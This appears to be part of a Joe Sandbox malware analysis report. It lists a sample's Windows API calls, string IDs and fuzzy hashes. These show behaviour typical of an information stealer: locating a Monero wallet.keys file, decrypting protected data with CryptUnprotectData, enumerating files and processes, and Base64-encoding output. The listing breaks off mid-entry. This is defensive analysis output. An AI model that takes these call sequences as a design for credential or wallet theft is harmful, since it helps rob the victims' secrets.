                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003F0D73), ref: 003DE4A2
                      • StrCmpCA.SHLWAPI(?,003F14F8), ref: 003DE4F2
                      • StrCmpCA.SHLWAPI(?,003F14FC), ref: 003DE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 003DEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: 0eac99089bbbe079ac24820d878f7e6c0dc51c9baaa382e2cc2e9d048893b0d7
                      • Instruction ID: fb9e932435c413618923622c77a967418c1c0aecd5f6b55a7c521ab17aaae608
                      • Opcode Fuzzy Hash: 0eac99089bbbe079ac24820d878f7e6c0dc51c9baaa382e2cc2e9d048893b0d7
                      • Instruction Fuzzy Hash: 571296329005689BDB16FB61DC96EED7379AF54300F4142A9B50A9A0D2EF307F49CF92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2Z?$?1_U$Aj$HDs$Ko<o$j]&
                      • API String ID: 0-3419901200
                      • Opcode ID: 26d3a6392acbf662acd0a582a173509615d8ce2a9ac00a5c27e02089991f3cce
                      • Instruction ID: ab94a45e1f479e9d644185acded72048f1350e506788ff08fa686184d6ea047a
                      • Opcode Fuzzy Hash: 26d3a6392acbf662acd0a582a173509615d8ce2a9ac00a5c27e02089991f3cce
                      • Instruction Fuzzy Hash: 4DB25CF3A0C2149FE3086E2DEC8567ABBE9EF94720F1A453DEAC5C3744E93558018693
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: cf~w$goL$ryz$xw$._$2kv
                      • API String ID: 0-2000573751
                      • Opcode ID: d024f2c146b4f83e44c50dd880ea39d2f43801ae3ab1902afc7d864ae77fd1e7
                      • Instruction ID: c2625d78386cb366a4bb5decb20dabc2ac218e4171ada224c170327253032372
                      • Opcode Fuzzy Hash: d024f2c146b4f83e44c50dd880ea39d2f43801ae3ab1902afc7d864ae77fd1e7
                      • Instruction Fuzzy Hash: CCB2E3F360C200AFE3046F29EC8566AFBE5EF94720F16492DEAC4C3744EA3558458797
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                      • LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: N=
                      • API String ID: 4291131564-3533945350
                      • Opcode ID: 458807886868430c4f3f89b9d31a5ee65a9240c7e69118a14ac6f6d019916dcc
                      • Instruction ID: f543e8a2ee28026cf39b78fae8b0572c661649e7744b599067ea7695f611f35a
                      • Opcode Fuzzy Hash: 458807886868430c4f3f89b9d31a5ee65a9240c7e69118a14ac6f6d019916dcc
                      • Instruction Fuzzy Hash: 0911A4B4241208EFEB10CFA4DC95FAA77B5FB89714F20805AF9159B390C775A941CB50
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: X}_$_q[E$f3e{$xQZ]${!$Nk
                      • API String ID: 0-1319305315
                      • Opcode ID: a6af9810b06665d235d31cb8a6879763842b35f73010f9037448c30d4e152f62
                      • Instruction ID: 5ece8489511640dc9fd08f3799fcb239be81f0acb6f8f7d4e5ccbac5eb59ff95
                      • Opcode Fuzzy Hash: a6af9810b06665d235d31cb8a6879763842b35f73010f9037448c30d4e152f62
                      • Instruction Fuzzy Hash: 2D42F5F360C2049FE7046F29EC8567ABBE5EF94320F1A453DEAC583744EA3698058797
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *f^$8zs$<{sW$uEv$z95+
                      • API String ID: 0-4223818057
                      • Opcode ID: 5882e667c5f2aef00311fa5014d41596a6342462f9adcd899791c0d7c67596b1
                      • Instruction ID: 33cf289e9e069791f87d1f41c6c03277fd7817a1c95f6c9ee5bf7251c2b35f08
                      • Opcode Fuzzy Hash: 5882e667c5f2aef00311fa5014d41596a6342462f9adcd899791c0d7c67596b1
                      • Instruction Fuzzy Hash: 62B208F3A086009FE3046E2DEC85B7ABBE9EF94320F16463DEAC4C7744E63558158697
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003DC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003DC87C
                      • lstrcat.KERNEL32(?,003F0B46), ref: 003DC943
                      • lstrcat.KERNEL32(?,003F0B47), ref: 003DC957
                      • lstrcat.KERNEL32(?,003F0B4E), ref: 003DC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: be9896e325d9ab8ec2edd628364565b1dd5c6cdd791416fee3a8bde6c102b28e
                      • Instruction ID: 0300de41b9874e3572b62d1facd1c57c60cd6be3695d263161bcddac7fb0a69a
                      • Opcode Fuzzy Hash: be9896e325d9ab8ec2edd628364565b1dd5c6cdd791416fee3a8bde6c102b28e
                      • Instruction Fuzzy Hash: 6141AFB991421EDFCB10CFA4DD88BFEB7B8BB48304F1441A9E509A6280D7709A84CF91
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 003E696C
                      • sscanf.NTDLL ref: 003E6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003E69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003E69C0
                      • ExitProcess.KERNEL32 ref: 003E69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: 3b87af77118ec516e6d5482b8eeabc89412143cea0a5ce06c4125ba9ad506a15
                      • Instruction ID: f58cd202092e8146cb452fe4076cf58dae2b2947f17186bdc6d862a7b7ad7e13
                      • Opcode Fuzzy Hash: 3b87af77118ec516e6d5482b8eeabc89412143cea0a5ce06c4125ba9ad506a15
                      • Instruction Fuzzy Hash: 7421FC75D10218ABCF45EFE4D945AEEB7B6FF48300F04852EE406E3250EB345605CB65
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003D724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003D7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003D72A4
                      • LocalFree.KERNEL32(?), ref: 003D72AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: b758a278dbc8e5a22d2c2ddb9b0724da24c92eb0ce2a84fae8cb61990adf4de0
                      • Instruction ID: 6c7f6a1e21e462dc8bb78220cb2dd2f208b7b51c8a7ec28f75d2944c59cc4730
                      • Opcode Fuzzy Hash: b758a278dbc8e5a22d2c2ddb9b0724da24c92eb0ce2a84fae8cb61990adf4de0
                      • Instruction Fuzzy Hash: 53011275A41208BBDB14DFD8DD49FEE7779EB44700F148555FB05AB2C0D670AA008B65
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003E961E
                      • Process32First.KERNEL32(003F0ACA,00000128), ref: 003E9632
                      • Process32Next.KERNEL32(003F0ACA,00000128), ref: 003E9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 003E965C
                      • CloseHandle.KERNEL32(003F0ACA), ref: 003E967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 16304f16109ee907071c90459025b5b109588e1dd2207db4d528b4af6e6db587
                      • Instruction ID: 3b34d0c39fea4aba123bff47f818c5ae59d54fcd4ce032cd1f27702966032c2b
                      • Opcode Fuzzy Hash: 16304f16109ee907071c90459025b5b109588e1dd2207db4d528b4af6e6db587
                      • Instruction Fuzzy Hash: BB011E75A11218EBCB15DFA5CD48BEDB7F9EB48310F14829AA90597290D7349B40CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,E{y$G]nq$G7]$>?
                      • API String ID: 0-2092499514
                      • Opcode ID: ed2d1e93aba618268a2f7468d0e0dfb40e0b6ec982edab7c436f3f3f1307ff77
                      • Instruction ID: 051ff00498c51ab86b788d8aac8104403595434974cd8dfaa0cf16b00a091fba
                      • Opcode Fuzzy Hash: ed2d1e93aba618268a2f7468d0e0dfb40e0b6ec982edab7c436f3f3f1307ff77
                      • Instruction Fuzzy Hash: 80B205F360C2109FE305AE2DEC8567ABBE9EF94320F16493DEAC5C7740E63598418697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0"7$8,_+$uD&;$67
                      • API String ID: 0-2140114596
                      • Opcode ID: 516c79891ce18c190ad9c3765d8033bc766cf3474fcd0b19a40952b04de8d6a0
                      • Instruction ID: a49ec95121aa154d6cae3beaf77cf89416162da998a751346c3cd9b8c0dbfd49
                      • Opcode Fuzzy Hash: 516c79891ce18c190ad9c3765d8033bc766cf3474fcd0b19a40952b04de8d6a0
                      • Instruction Fuzzy Hash: 8472E8F3A0C300AFE304AE29ECC566AB7E9EF94720F1A453DEAC4C7744E67558118697
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,003D5184,40000001,00000000,00000000,?,003D5184), ref: 003E8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: 80149a8d2b2696aa54adc0539d82a5495cfefb9b379e3c6e395a3267861d833b
                      • Instruction ID: 459386d823244867dee8f20f8a5cd7cacb05c33f3aa6b785524b1f4245502c5a
                      • Opcode Fuzzy Hash: 80149a8d2b2696aa54adc0539d82a5495cfefb9b379e3c6e395a3267861d833b
                      • Instruction Fuzzy Hash: 36112E70600244FFDB01CFA5E884FA733AAAF89300F149648F9198B290DB35EC42DB60
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0108DF20,00000000,?,003F0E10,00000000,?,00000000,00000000), ref: 003E7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0108DF20,00000000,?,003F0E10,00000000,?,00000000,00000000,?), ref: 003E7A7D
                      • wsprintfA.USER32 ref: 003E7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 9062ba8c8fe3d7bfa293daaf774ce0e70971d8b7aa02b343cb49ed56fc3330f9
                      • Instruction ID: 4b36ae3861bd7231dc02f2ba4bbe6ea0bc49c3fda59a4b575ac2e031fd61c211
                      • Opcode Fuzzy Hash: 9062ba8c8fe3d7bfa293daaf774ce0e70971d8b7aa02b343cb49ed56fc3330f9
                      • Instruction Fuzzy Hash: 71115EB1D46268EBEB20CF55DC49FA9B778FB04721F1043AAE91A932C0D7745A40CF91
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "u}$@Gm[$QB=Y$v;
                      • API String ID: 0-3572847674
                      • Opcode ID: e1c80920b61a822c98d93836a90c1ece204e1ff81807283efdbe243fbfaf88a2
                      • Instruction ID: c2082808b45f3ad0a876ec9e58c1048a453288067ab2fc668bfcd5f8e016eee2
